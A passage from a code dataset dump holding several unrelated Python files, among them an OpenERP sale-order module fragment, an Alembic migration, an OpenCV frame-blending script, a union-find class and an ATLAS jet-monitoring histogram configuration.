uid, product, context=context_partner)\n\n uom2 = False\n price_list = self.pool.get('product.pricelist').browse(cr, uid, pricelist)\n if uom:\n uom2 = product_uom_obj.browse(cr, uid, uom)\n if product_obj.uom_id.category_id.id != uom2.category_id.id:\n uom = False\n if uos:\n if product_obj.uos_id:\n uos2 = product_uom_obj.browse(cr, uid, uos)\n if product_obj.uos_id.category_id.id != uos2.category_id.id:\n uos = False\n else:\n uos = False\n fpos = fiscal_position and self.pool.get('account.fiscal.position').browse(cr, uid, fiscal_position) or False\n if update_tax: #The quantity only have changed\n result['tax_id'] = self.pool.get('account.fiscal.position').map_tax(cr, uid, fpos, product_obj.taxes_id)\n\n if not flag:\n result['name'] = self.pool.get('product.product').name_get(cr, uid, [product_obj.id], context=context_partner)[0][1]\n if product_obj.description_sale:\n result['name'] += '\\n'+product_obj.description_sale\n domain = {}\n if (not uom) and (not uos):\n result['product_uom'] = product_obj.uom_id.id\n if product_obj.uos_id:\n result['product_uos'] = product_obj.uos_id.id\n result['product_uos_qty'] = qty * product_obj.uos_coeff\n uos_category_id = product_obj.uos_id.category_id.id\n else:\n result['product_uos'] = False\n result['product_uos_qty'] = qty\n uos_category_id = False\n result['th_weight'] = qty * product_obj.weight\n domain = {'product_uom':\n [('category_id', '=', product_obj.uom_id.category_id.id)],\n 'product_uos':\n [('category_id', '=', uos_category_id)]}\n elif uos and not uom: # only happens if uom is False\n result['product_uom'] = product_obj.uom_id and product_obj.uom_id.id\n result['product_uom_qty'] = qty_uos / product_obj.uos_coeff\n result['th_weight'] = result['product_uom_qty'] * product_obj.weight\n elif uom: # whether uos is set or not\n default_uom = product_obj.uom_id and product_obj.uom_id.id\n q = product_uom_obj._compute_qty(cr, uid, uom, qty, default_uom)\n if product_obj.uos_id:\n result['product_uos'] = product_obj.uos_id.id\n result['product_uos_qty'] = qty * product_obj.uos_coeff\n else:\n result['product_uos'] = False\n result['product_uos_qty'] = qty\n result['th_weight'] = q * product_obj.weight # Round the quantity up\n\n if not uom2:\n uom2 = product_obj.uom_id\n # get unit price\n if not pricelist:\n warn_msg = _('You have to select a pricelist or a customer in the sales form !\\n'\n 'Please set one before choosing a product.')\n warning_msgs += _(\"No Pricelist ! : \") + warn_msg +\"\\n\\n\"\n else:\n res_user_obj = self.pool.get('res.users').browse(cr, uid, [uid])[0]\n if price_list.currency_id.id != res_user_obj.company_id.currency_id.id:\n if exchange_rate == 0:\n exchange_rate = 1\n price = product_obj.list_price * exchange_rate\n result.update({'price_unit': price})\n else:\n price = self.pool.get('product.pricelist').price_get(cr, uid, [pricelist],\n product, qty or 1.0, partner_id, {\n 'uom': uom or result.get('product_uom'),\n 'date': date_order,\n })[pricelist]\n if price is False:\n warn_msg = _(\"Cannot find a pricelist line matching this product and quantity.\\n\"\n \"You have to change either the product, the quantity or the pricelist.\")\n\n warning_msgs += _(\"No valid pricelist line found ! :\") + warn_msg +\"\\n\\n\"\n else: \n result.update({'price_unit': price})\n if warning_msgs:\n warning = {\n 'title': _('Configuration Error!'),\n 'message' : warning_msgs\n }\n \n result['type'] = product_obj.procure_method\n result['cost'] = product_obj.standard_price * price_list.currency_id.rate_silent\n\n return {'value': result, 'domain': domain, 'warning': warning}\n\nsale_order_line()\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","sub_path":"sale_extended/sale_extended.py","file_name":"sale_extended.py","file_ext":"py","file_size_in_byte":19133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"597826737","text":"\"\"\"empty message\n\nRevision ID: e49f2de9ab0e\nRevises: 75f20a900418\nCreate Date: 2020-01-23 16:30:55.509180\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'e49f2de9ab0e'\ndown_revision = '75f20a900418'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('user',\n sa.Column('id', sa.String(length=32), nullable=False),\n sa.Column('pw', sa.String(length=64), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n mysql_collate='utf8_general_ci'\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('user')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/e49f2de9ab0e_.py","file_name":"e49f2de9ab0e_.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"237795530","text":"import cv2\nimport os\nimport numpy as np\n# from PIL import Image\n\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\npath1 = '/home/rain/shipin/input/'\npath2 = '/home/rain/shipin/png_out/'\nlength = len(os.listdir(path2))\n\nvideoWriter = cv2.VideoWriter(\n '/home/rain/shipin/MVI_1983光流4.avi', fourcc, 8, (960, 540))\nfor i in range(1, length + 1):\n img1 = cv2.imread(path1 + str(i) + '.png')\n img2 = cv2.imread(path2 + str(i) + '.png')\n lower = np.array([250, 250, 250])\n upper = np.array([256, 256, 256])\n mask = cv2.inRange(img2, lower, upper)\n\n img_mask = np.copy(img2)\n img_mask[mask != 0] = [0, 0, 0]\n img2 = cv2.resize(img_mask, (960, 540))\n # cv2.imshow('img', img2)\n # cv2.waitKey(1)[']''0\n # 合并,其中参数1表示透明度,第一个1表示img1不透明,第二个1表示img2不透明\n # 如果改成0.5表示合并的时候已多少透明度覆盖。\n img_mix = cv2.addWeighted(img1, 1, img2, 0.6, 0)\n videoWriter.write(img_mix)\n print(str(i) + '.png' + ' done!')\nvideoWriter.release()\n","sub_path":"hc.py","file_name":"hc.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"111120140","text":"\"\"\"\n题目描述\nLL今天心情特别好,因为他去买了一副扑克牌,发现里面居然有2个大王,2个小王(一副牌原本是54张^_^)...他随机从中抽出了5张牌,想测测自己\n的手气,看看能不能抽到顺子,如果抽到的话,他决定去买体育彩票,嘿嘿!!“红心A,黑桃3,小王,大王,方片5”,“Oh My God!”不是顺子.....LL不\n高兴了,他想了想,决定大\\小 王可以看成任何数字,并且A看作1,J为11,Q为12,K为13。上面的5张牌就可以变成“1,2,3,4,5”(大小王分别看作2\n和4),“So Lucky!”。LL决定去买体育彩票啦。 现在,要求你使用这幅牌模拟上面的过程,然后告诉我们LL的运气如何, 如果牌能组成顺子就输出\ntrue,否则就输出false。为了方便起见,你可以认为大小王是0。\n\"\"\"\n\n\n# -*- coding:utf-8 -*-\nclass Solution:\n def IsContinuous(self, numbers):\n # write code here\n if numbers == []:\n return False\n\n numbers = sorted(numbers)\n count = numbers.count(0)\n length = len(numbers) - 1\n for i in range(length, count, -1):\n if numbers[i] == numbers[i - 1]:\n return False\n else:\n count = count - (numbers[i] - numbers[i - 1] - 1)\n if count < 0:\n return False\n return True\n","sub_path":"剑指office/扑克牌顺子.py","file_name":"扑克牌顺子.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"391677932","text":"# Copyright (C) 2002-2020 CERN for the benefit of the ATLAS collaboration\n\nfrom AthenaCommon import SystemOfUnits\nfrom JetMonitoring.JetMonitoringConfig import HistoSpec, EventHistoSpec, VarSpec, ConfigDict, ToolSpec\n\n# *********************************************** \n# ***********************************************\n# The list of \"jet variable\"\" which are not simple float. Or aliases to simple float.\n# A VarSpec specify :\n# 1) the name of a jet attribute\n# 2) its type\n# 3) optional and only if type is vector, the index of the element of the vector to be plotted\n# (simple float can be generated on-the-fly just by their name. they don't need spec)\n\nknownVar = dict( \n mass = VarSpec('m:GeV', 'float'),\n JVF = VarSpec('JVF', 'vecfloat'),\n EPS = VarSpec('EnergyPerSampling', 'vecfloat'),\n\n # this variable has an index specified. It will thus has only 1 value per jet : the JVF at pos 0\n JVF0 = VarSpec('JVF', 'vecfloat', 0),\n\n)\n\n\nknownEventVar = dict( \n # These always are of type 'float'\n avgMu = ToolSpec('EventHistoVarTool', 'avgMu', Attribute='averageInteractionsPerCrossing'),\n actMu = ToolSpec('EventHistoVarTool', 'actMu', Attribute='actualInteractionsPerCrossing'),\n njets = ToolSpec('NumJetVarTool', 'njets', ),\n njetsPt20 = ToolSpec('NumJetVarTool', 'njetsPt20', PtCut=20.),\n njetsPt50 = ToolSpec('NumJetVarTool', 'njetsPt50', PtCut=50.),\n njetsEt20 = ToolSpec('NumJetVarTool', 'njetsEt20', EtCut=20.),\n njetsEt50 = ToolSpec('NumJetVarTool', 'njetsEt50', EtCut=50.),\n njetsEt40Eta1_2 = ToolSpec('NumJetVarTool', 'njetsEt40Eta1_2', EtCut=50., EtaMin=1., EtaMax=2.),\n)\n\n# ***************************************\n# The list of standard jet histograms.\n# This is a list of specification, each describing how to histogram a jet variable into 1D or 2D histos.\n# A specification is a specialized dictionnary (a HistoSpec, see JetMonitoringConfig.py)\n# The format is :\n# HistoSpec( name , bins , optional_arguments... )\n# where 'name' is a string and 'bins' is a tuple as in (nbin,xmin,xmax) or (nbinx,xmin,xmax,nbiny,ymin,ymax) \n# See various commented examples below for optional arguments.\n\n_knownHistos = [\n # Simple form : histogram of variable 'eta' (the name of spec is the same as the name of variable)\n # As in TH1 ctor, ';' in the title is interpreted as in \"Main Title;Title xAxis;Title yAxis\"\n HistoSpec( 'eta', (50,-5,5) , title='#eta;#eta;Entries'),\n HistoSpec( 'phi', (50,-3.3,3.3) , title='#phi;#phi;Entries'),\n # Same but we indicate that the variable is to be plotted in GeV by appending ':GeV'\n HistoSpec( 'pt:GeV', (100,0,200) , title='p_{T};p_{T} [GeV];'), \n HistoSpec( 'm:GeV', (100,0,300) , title='mass;mass [GeV];'),\n HistoSpec( 'e:GeV', (100,0,500) , title='E;E [GeV];'), \n HistoSpec( 'et:GeV', (100,0,750), title='E_{T};E_{T} [GeV],'),\n\n # We want an other pT histo, with different bins.\n # We add a new spec with a new name and we indicate the actual variable with the argument xvar\n HistoSpec( 'highpt', (100,0.,4000) , title='p_{T};p_{T} [GeV];', xvar='pt:GeV'), \n\n #EventHistoSpec( 'njets', (30,0,30), title='Jet Multiplicity;Njets;Entries' ),\n # When the jet variable is not a simple float, use the xvar argument to refer to a detailed variable spec in 'knownVar'\n HistoSpec( 'JVF', (100,0,1.2) , title='Jet Vtx Frac;JVF;', xvar='JVF'), \n # if the var name contains '[N]' the system will assume the variable is a vector and setup tools accordingly (so we don't need to specify 'xvar')\n HistoSpec( 'JVF[0]', (100,0,1.2) , title='JVF for vtx 0;JVF[0];', ), \n HistoSpec( 'JVF[1]', (100,0,1.2) , title='JVF for vtx 1;JVF[1];', ),\n\n\n # full list\n HistoSpec('ptN', (250, 0.0, 5000.0), title='Jet Pt;Pt [GeV];', xvar='pt:GeV'),\n\n HistoSpec('EMFrac', (50, -0.1, 1.4), title='EM Fraction;EM fraction;', ),\n HistoSpec('LArQuality', (50, -0.4, 1.2), title='LAr quality;Energy;', ),\n HistoSpec('HECQuality', (50, -0.1, 1.4), title='HEC Quality;HEC Quality;', ),\n HistoSpec('HECFrac', (50, -0.1, 1.4), title='HEC Fraction;HEC fraction;', ),\n HistoSpec('AverageLArQF', (100, 0, 65535), title='Average LAr QF;AverageLArQF;', ),\n HistoSpec('FracSamplingMaxIndex', (24, 0, 24), title='FracSamplingMaxIndex; FracSamplingMaxIndex;', xvar=VarSpec('FracSamplingMaxIndex','int')),\n HistoSpec('FracSamplingMax', (50, -0.1, 1.2), title='FracSamplingMax; FracSamplingMax;', ),\n HistoSpec('Timing', (40, -20, 20), title='Jet Time info;Time;', ),\n\n \n HistoSpec('LeadingClusterSecondLambda', (100, 0.0, 10000.0), title='LeadingClusterSecondLambda; LeadingClusterSecondLambda;', ),\n HistoSpec('LeadingClusterSecondR', (100, 0.0, 100000.0), title='LeadingClusterSecondR; LeadingClusterSecondR;', ),\n HistoSpec('OotFracClusters5', (50, -0.1, 1.2), title='OotFracClusters5; OotFracClusters5;', ),\n HistoSpec('OotFracClusters10', (50, -0.1, 1.2), title='OotFracClusters10; OotFracClusters10;', ),\n \n HistoSpec('Jvt', (70, -0.2, 1.2), title='Jet JVT;JVT;', ),\n HistoSpec('JVFCorr', (120, -1.2, 1.2), title='Jet JVT; JVFCorr;', ),\n HistoSpec('JvtRpt', (75, 0, 1.5), title='Jet JVT Rpt; JVTRpt;', ),\n HistoSpec('EM3Frac', (50,-0.1,1.0), title=\"EM3 fraction;EM3 fraction;Entries\"),\n HistoSpec('Tile0Frac', (50,-0.1,1.0), title=\"Tile0 fraction;Tile0 fraction;Entries\"),\n\n\n HistoSpec('GhostMuonSegmentCount', (60, 0, 60), title='Number of associated muon segments;Number;', xvar=VarSpec('GhostMuonSegmentCount','int')),\n HistoSpec('GhostTruthCount', (60, 0, 60), title='Number of associate truth part;Number;', xvar=VarSpec('GhostTruthCount','int')),\n HistoSpec('GhostTrackCount', (60, 0, 60), title='Number of associate tracks;Number;', xvar=VarSpec('GhostTrackCount','int')),\n HistoSpec('GhostTruthAssociationFraction', (50, 0, 1.0), title='Fraction of associated truth particles from a matched truth jet jet;GhostTruthAssociationFraction;', ),\n \n HistoSpec('Width', (50, 0, 1.0), title='Jet Width;Width;', ),\n HistoSpec('Width15', (50, 0, 1.5), title='Jet Width;Width;', xvar='Width'),\n HistoSpec('Mu12', (100, 0, 1.0), title='Mu12;Mu12;', ),\n\n HistoSpec('NumTrkPt500[0]', (100, 0, 100), title='Number of tracks from PV0 above 0.5 GeV:N_{tracks}(p_{T}>0.5 GeV);NumTrkPt500;Entries', ),\n HistoSpec('NumTrkPt1000[0]', (100, 0, 100), title='Number of all tracks above 1 GeV:N_{tracks}(p_{T}>1 GeV);NumTrkPt1000;Entries', ),\n HistoSpec('SumPtTrkPt500[0]:GeV', (100, 0, 200), title='Sum Pt of all tracks above 0.5 GeV:SumPtTrk(p_{T}>0.5 GeV);SumPtTrkPt500 [GeV];Entries', ),\n HistoSpec('SumPtChargedPFOPt500[0]:GeV', (100, 0, 200), title='Sum Pt of all charged PFO above 0.5 GeV:SumPtChargedPFO(p_{T}>0.5 GeV);SumPtChargedPFOPt500 [GeV];Entries', ),\n HistoSpec('fCharged', (100, 0, 2), title='Normalised sum Pt of all charged PFO above 0.5 GeV:fCharged(p_{T}>0.5 GeV);fCharged;Entries', ),\n\n HistoSpec('FoxWolfram4', (100, -1, 1), title='FoxWolfram0;FoxWolfram4;', ),\n HistoSpec('FoxWolfram0', (100, -1, 1), title='FoxWolfram0;FoxWolfram0;', ),\n HistoSpec('FoxWolfram1', (100, -1, 1), title='FoxWolfram0;FoxWolfram1;', ),\n HistoSpec('FoxWolfram2', (100, -1, 1), title='FoxWolfram0;FoxWolfram2;', ),\n HistoSpec('FoxWolfram3', (100, -1, 1), title='FoxWolfram0;FoxWolfram3;', ),\n\n HistoSpec('ZCut12', (100, 0, 1.0), title='ZCut12;ZCut12;', ),\n HistoSpec('ZCut23', (100, 0, 1.0), title='ZCut23;ZCut23;', ),\n HistoSpec('ZCut34', (100, 0, 1.0), title='ZCut34;ZCut34;', ),\n\n HistoSpec('KtDR', (100, 0, 10), title='KtDR;KtDR;', ),\n \n HistoSpec('Split12', (100, 0, 5000), title='Split12;Split12;', ),\n HistoSpec('Split23', (100, 0, 5000), title='Split23;Split23;', ),\n HistoSpec('Split34', (100, 0, 5000), title='Split34;Split34;', ),\n\n HistoSpec('D2', (100, -1, 1), title='D2;D2;', ),\n HistoSpec('D2_Beta2', (100, -1, 1), title='D2_Beta2;D2_Beta2;', ),\n\n HistoSpec('ThrustMaj', (100, -1, 2), title='ThrustMaj;ThrustMaj;', ),\n HistoSpec('ThrustMin', (100, -1, 2), title='ThrustMin;ThrustMin;', ),\n \n HistoSpec('ECF2', (100, 0, 10000), title='ECF2;ECF2;', ),\n HistoSpec('ECF3', (100, 0, 10000), title='ECF3;ECF3;', ),\n HistoSpec('ECF1', (100, 0, 10000), title='ECF1;ECF1;', ),\n HistoSpec('ECF1_Beta2', (100, -1, 1), title='ECF1_Beta2;ECF1_Beta2;', ),\n HistoSpec('ECF3_Beta2', (100, -1, 1), title='ECF3_Beta2;ECF3_Beta2;', ),\n HistoSpec('ECF2_Beta2', (100, -1, 1), title='ECF2_Beta2;ECF2_Beta2;', ),\n\n HistoSpec('DipExcl12', (100, -1, 2), title='DipExcl12;DipExcl12;', ),\n HistoSpec('Dip12', (100, -1, 2), title='Dip12;Dip12;', ),\n HistoSpec('Dip23', (100, -1, 2), title='Dip23;Dip23;', ),\n HistoSpec('Dip13', (100, -1, 2), title='Dip13;Dip13;', ),\n \n HistoSpec('C1_Beta2', (100, -1, 1), title='C1;C1;', xvar='C1'),\n HistoSpec('C2_Beta2', (100, -1, 1), title='C2_Beta2;C2_Beta2;', ),\n HistoSpec('C2', (100, -1, 1), title='C2;C2;', ),\n HistoSpec('C1', (100, -1, 1), title='C1;C1;', ),\n\n HistoSpec('NegativeE:GeV', (80, -10, 0), title='Negative E in Jet;Energy;', ),\n HistoSpec('N90Constituents', (15, 0, 15), title='N90Constituents; N90Constituents;', ),\n\n HistoSpec('BchCorrDotx', (50, 0, 1), title='BchCorrDotx:BchCorrDotx;', ),\n HistoSpec('BchCorrCell', (50, 0, 1), title='BchCorrCell:BchCorrCell;', ),\n\n \n HistoSpec('TrackWidthPt1000[0]', (75, 0.0, 1.5), title='Width from tracks from PV0 above 1 GeV:Track Width(p_{T}>1 GeV);', ),\n\n\n HistoSpec('Volatility', (100, -100, 100), title='Volatility;Volatility;', ),\n HistoSpec('PlanarFlow', (100, -1, 1.1), title='PlanarFlow;PlanarFlow;', ),\n HistoSpec('CentroidR', (100, 0, 7500), title='CentroidR; CentroidR;', ),\n HistoSpec('Sphericity', (100, 0, 1), title='Sphericity;Sphericity;', ),\n HistoSpec('Aplanarity', (100, 0, 1), title='Aplanarity;Aplanarity;', ),\n HistoSpec('Angularity', (100, -0.1, 0.1), title='Angularity;Angularity;', ),\n\n\n\n HistoSpec('Tau1', (100, 0, 1.0), title='Tau1;Tau1;', ),\n HistoSpec('Tau2', (100, 0, 1.0), title='Tau2;Tau2;', ),\n HistoSpec('Tau3', (100, 0, 1.0), title='Tau3;Tau3;', ),\n HistoSpec('Tau21', (100, 0, 1.0), title='Tau21;Tau21;', ),\n HistoSpec('Tau32', (100, 0, 1.0), title='Tau32;Tau32;', ),\n HistoSpec('Tau1_wta', (100, 0, 1.0), title='Tau1_wta;Tau1_wta;', ),\n HistoSpec('Tau3_wta', (100, 0, 1.0), title='Tau3_wta;Tau3_wta;', ),\n HistoSpec('Tau2_wta', (100, 0, 1.0), title='Tau2_wta;Tau2_wta;', ),\n HistoSpec('Tau21_wta', (100, 0, 1.0), title='Tau21_wta;Tau21_wta;', ),\n HistoSpec('Tau32_wta', (100, 0, 1.0), title='Tau32_wta;Tau32_wta;', ),\n\n HistoSpec('Charge', (100, -2, 2), title='Charge;Charge;', ),\n\n HistoSpec('ActiveArea', (80, 0, 0.8), title='Active Area;Area;', ),\n HistoSpec('ActiveArea15', (80, 0, 1.5), title='Active Area;Area;', xvar='ActiveArea'),\n\n HistoSpec('PullPhi', (100, -6.3, 6.3), title='PullPhi;PullPhi;', ),\n HistoSpec('PullMag', (100, 0, 100), title='PullMag;PullMag;', ),\n HistoSpec('Pull_C10', (100, -1, 1), title='Pull_C10;Pull_C10;', ),\n HistoSpec('Pull_C11', (100, -1, 1), title='Pull_C11;Pull_C11;', ),\n HistoSpec('Pull_C01', (100, -1, 1), title='Pull_C01;Pull_C01;', ),\n HistoSpec('Pull_C00', (100, -1, 1), title='Pull_C00;Pull_C00;', ),\n\n HistoSpec('ShowerDeconstructionW', (100, -100, 100), title='ShowerDeconstructionW;ShowerDeconstructionW;', ),\n HistoSpec('ShowerDeconstructionTop', (100, -100, 100), title='ShowerDeconstructionTop;ShowerDeconstructionTop;', ),\n\n\n HistoSpec( 'JetConstitScaleMomentum_eta', (50,-5,5) , title='ConstitScale #eta;ConstitScale #eta;Entries'),\n HistoSpec( 'JetConstitScaleMomentum_phi', (50,-3.3,3.3) , title='ConstitScale #phi;ConstitScale #phi;Entries'),\n HistoSpec( 'JetConstitScaleMomentum_pt:GeV', (100,0,200) , title='ConstitScale p_{T};ConstitScale p_{T} [GeV];Entries'), \n HistoSpec( 'JetConstitScaleMomentum_m:GeV', (100,0,300) , title='ConstitScale mass;ConstitScale mass [GeV];Entries'),\n \n HistoSpec( 'JetEMScaleMomentum_eta', (50,-5,5) , title='EMScale #eta;EMScale #eta;Entries'),\n HistoSpec( 'JetEMScaleMomentum_phi', (50,-3.3,3.3) , title='EMScale #phi;EMScale #phi;Entries'),\n HistoSpec( 'JetEMScaleMomentum_pt:GeV', (100,0,200) , title='EMScale p_{T};EMScale p_{T} [GeV];Entries'), \n HistoSpec( 'JetEMScaleMomentum_m:GeV', (100,0,300) , title='EMScale mass;EMScale mass [GeV];Entries'),\n\n HistoSpec( 'JetPileupScaleMomentum_eta', (50,-5,5) , title='PileupScale #eta;PileupScale #eta;Entries'),\n HistoSpec( 'JetPileupScaleMomentum_phi', (50,-3.3,3.3) , title='PileupScale #phi;PileupScale #phi;Entries'),\n HistoSpec( 'JetPileupScaleMomentum_pt:GeV', (100,0,200) , title='PileupScale p_{T};PileupScale p_{T} [GeV];Entries'), \n HistoSpec( 'JetPileupScaleMomentum_m:GeV', (100,0,300) , title='PileupScale mass;PileupScale mass [GeV];Entries'),\n\n HistoSpec( 'JetEtaJESScaleMomentum_eta', (50,-5,5) , title='EtaJESScale #eta;EtaJESScale #eta;Entries'),\n HistoSpec( 'JetEtaJESScaleMomentum_phi', (50,-3.3,3.3) , title='EtaJESScale #phi;EtaJESScale #phi;Entries'),\n HistoSpec( 'JetEtaJESScaleMomentum_pt:GeV', (100,0,200) , title='EtaJESScale p_{T};EtaJESScale p_{T} [GeV];Entries'), \n HistoSpec( 'JetEtaJESScaleMomentum_m:GeV', (100,0,300) , title='EtaJESScale mass;EtaJESScale mass [GeV];Entries'),\n # ---------------------\n # 2D histogram (x and y vars are separated by ';' )\n HistoSpec( 'pt:GeV;m:GeV', (100,0,1000, 100,0,300) , title='mass vs p_{T};p_{T};mass [GeV];'),\n\n]\n \n\n# ---------------------\n# Below we add specifications for custom monitoring tools used to create histograms not drawable from simple attribute/variables.\n# We rely on the generic 'ToolSpec' dictionnary.\n# Format is: ToolSpec('ToolClassName', 'toolName', defineHistoFunc=aFunction , ...properties...) where \n# - defineHistoFunc is mandatory. It must be a function with signature similar as HistoSpec.defineHisto\n# and dedicated to define histograms as in standard monitoring configuration.\n# - properties are properties of the 'ToolClassName'. They will be transfered to the c++\n# instance. If a property is itself a tool, it can be specified as a ToolSpec.\n# \n\n# -- JetHistoLeadingJetsRelations specification\n# The python helper defining the histograms using the monitoring framework :\ndef defineHistoForLeadingJets(conf, parentAlg, monhelper, path): \n \n # helpfor that generates the monitoring group#\n group = monhelper.addGroup(parentAlg, conf.Group, 'Jets/'+parentAlg.JetContainerName)\n path = 'standardHistos'\n group.defineHistogram('dEta;leadJetsDEta', path=path, xbins=100, xmin=-5, xmax=5) \n group.defineHistogram('dPhi;leadJetsDPhi', path=path, xbins=100, xmin=-3, xmax=3) \n group.defineHistogram('dR;leadJetsDR', path=path, xbins=100, xmin=0, xmax=10) \n \n\n# Add the specifications\n_knownHistos += [ \n ToolSpec('JetHistoLeadingJetsRelations', 'leadingJetsRel', defineHistoFunc=defineHistoForLeadingJets, Group='LeadingJetGroup',)\n]\n\n\n\n\n# -- JetHistoResponseAndEff specification\n# this tools allows to plot a fixed set of efficiency and response histos vs truth (or any other reference container).\n# The python helper defining the histograms using the monitoring framework :\ndef defineHistoForRespAndEff(conf, parentAlg, monhelper , path):\n # create a monitoring group with the histo path starting from the parentAlg\n group = monhelper.addGroup(parentAlg, conf.Group, 'Jets/'+parentAlg.JetContainerName)\n path = 'standardHistos'\n # define the histogram\n group.defineHistogram('passDr1,refPt;efficiencyR1',title='Passing deltaR<0.1', type=\"TEfficiency\", path=path, xbins=100 , xmin=0, xmax=4000. ,)\n group.defineHistogram('passDr2,refPt;efficiencyR2',title='Passing deltaR<0.2', type=\"TEfficiency\", path=path, xbins=100 , xmin=0, xmax=4000. ,)\n group.defineHistogram('passDr3,refPt;efficiencyR3',title='Passing deltaR<0.3', type=\"TEfficiency\", path=path, xbins=100 , xmin=0, xmax=4000. ,)\n group.defineHistogram('relDiff',title='pT relative Diff', type=\"TH1F\", path=path, xbins=100 , xmin=-2, xmax=2. ,)\n group.defineHistogram('refEta,relDiff',title='pT relative Diff vs Eta', type=\"TH2F\", path=path, xbins=60 , xmin=-5, xmax=5., ybins=60 , ymin=-2, ymax=2. ,)\n group.defineHistogram('refPt,relDiff',title='pT relative Diff vs pT', type=\"TH2F\", path=path, xbins=60 , xmin=0, xmax=5000., ybins=60 , ymin=-2, ymax=2. ,)\n\n_knownHistos += [ \n ToolSpec('JetHistoResponseAndEff', 'respVsAntiKt4Truth', defineHistoFunc=defineHistoForRespAndEff, Group='AntiK4TruthRespGroup', RefContainerName=\"AntiKt4TruthJets\", EnergyScale=1./SystemOfUnits.GeV),\n ToolSpec('JetHistoResponseAndEff', 'respVsAntiKt10TruthTrim', defineHistoFunc=defineHistoForRespAndEff, Group='AntiK10TruthTrimRespGroup', RefContainerName=\"AntiKt10TruthTrimmedPtFrac5SmallR20Jets\", EnergyScale=1./SystemOfUnits.GeV),\n]\n# purely for convenience we add a map of JetContainer name -> JetHistoResponseAndEff spec\nresponseAndEffSpecMap = dict(\n AntiKt4TruthJets = 'respVsAntiKt4Truth',\n AntiKt10TruthTrimmedPtFrac5SmallR20Jets = 'respVsAntiKt10TruthTrim',\n )\n\n\n\n\n# --\nknownHistos = ConfigDict( )\n# convert the list into a dictionnary indexed by spec name\nfor h in _knownHistos:\n knownHistos[h.name] = h\n\n\n\n\n\n# **********************************************************\n# commented out example of a defineHistoFunc suitable for custom tool specifications\n# def defineHistoForHistoPtTool(conf, parentAlg, monhelper , path):\n# group = monhelper.addGroup(parentAlg, conf.Group, parentAlg.JetContainerName+'/')\n \n# group.defineHistogram('jetPt', path='TestPtTool', xbins=100, xmin=0, xmax=160)\n\n\n# ***************************************\n# The list of known JetSelectorTool\n#from JetSelectorTools.JetSelectorToolsConf import JetCleaningTool\nknownSelector = dict(\n LooseBad = ToolSpec('JetCleaningTool' , \"LooseBadJets\" , CutLevel = \"LooseBad\")\n)\n","sub_path":"Reconstruction/Jet/JetMonitoring/python/JetStandardHistoSpecs.py","file_name":"JetStandardHistoSpecs.py","file_ext":"py","file_size_in_byte":18035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"40264865","text":"class UnionFind:\n def __init__(self, size):\n self.size = size\n self.numOfComponents = size\n self.id = []\n self.sz = []\n self._construct()\n\n def _construct(self):\n for index in range(self.size):\n self.id.append(index)\n self.sz.append(1)\n\n def find(self, index):\n root = index\n while root != self.id[root]:\n root = self.id[root]\n\n while index != root:\n next = self.id[index]\n self.id[index] = root\n index = next\n return root\n\n def connected(self, ele1, ele2):\n return self.find(ele1) == self.find(ele2)\n\n def components(self):\n return self.numOfComponents\n\n def unify(self, index1, index2):\n root1 = self.find(index1)\n root2 = self.find(index2)\n\n if root1 == root2:\n return\n if self.sz[root1] > self.sz[root2]:\n self.sz[root1] += self.sz[root2]\n self.id[root2] = root1\n else:\n self.sz[root2] += self.sz[root1]\n self.id[root1] = root2\n self.numOfComponents -= 1\n return True\n\n\nufo = UnionFind(10)\nprint(ufo.unify(4, 7))\nprint(ufo.unify(3, 7))\nprint(ufo.id)\nprint(ufo.find(4))\nprint(ufo.connected(3, 4))\nprint(ufo.numOfComponents)","sub_path":"data_structs/unionFind_ds.py","file_name":"unionFind_ds.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"32862874","text":"\nimport sys\n\nfrom api import RESTHandler, getProjects, createNewProject, createNewScriptType\nimport parsed\nfrom time import sleep\n\ndef getHelp():\n print(\"Missing argument: Server. Use sync like this: python3 sync.py [server (local or centralized)] [flags]\")\n print(\"Potentional flags\")\n print(\"--use-http: Forces the use of http over https (local will always use http\")\n\ndef getProjectId(handler):\n projects = getProjects(handler)\n projects.append({'id':'', 'name':'Create new project...'})\n print(\"Choose project to upload to\")\n for project, counter in zip(projects, range(len(projects))):\n print(\"%2i: %s\" %(counter, project['name']))\n print(\"Select project (c to cancel)\")\n chosen = input(\">>>\")\n try:\n numb = int(chosen)\n except:\n # value is not a number\n print(\"Bye!\")\n sys.exit(1)\n if projects[numb]['id'] == '': # create new project\n id = createNewProject(handler)\n else:\n id = projects[numb]['id']\n \n return id\n\n\ndef getTypes(handler, id):\n print(\"\\n\\n\")\n print(\"Time to choose script types\")\n result = handler.get(\"/project/\")\n j = result.json()\n spesificProject = {}\n \n for p in j:\n if p['id'] == id:\n spesificProject = p\n sts = spesificProject['scriptTypes']\n sts.append({'id':'', 'name':'Create new script type...'})\n if (len(sts) == 1):\n print(\"No existsing types found\")\n return createNewScriptType(handler, id)\n else:\n for t, i in zip(sts, range(len(sts))):\n print(\"%2i: %s\" % (i, t['name']))\n \n \n print(\"Choose script type (c to cancel)\")\n\n try:\n n = int(input(\">>>\"))\n except:\n print(\"bye!\")\n sys.exit(1)\n if sts[n]['id'] == '': # create new\n return createNewScriptType(handler, id)\n return sts[n]['id']\n\ndef uploadParsed(handler, projectId, scriptId):\n print(\"Choose mode: (c to cancel)\")\n print(\" 0: upload 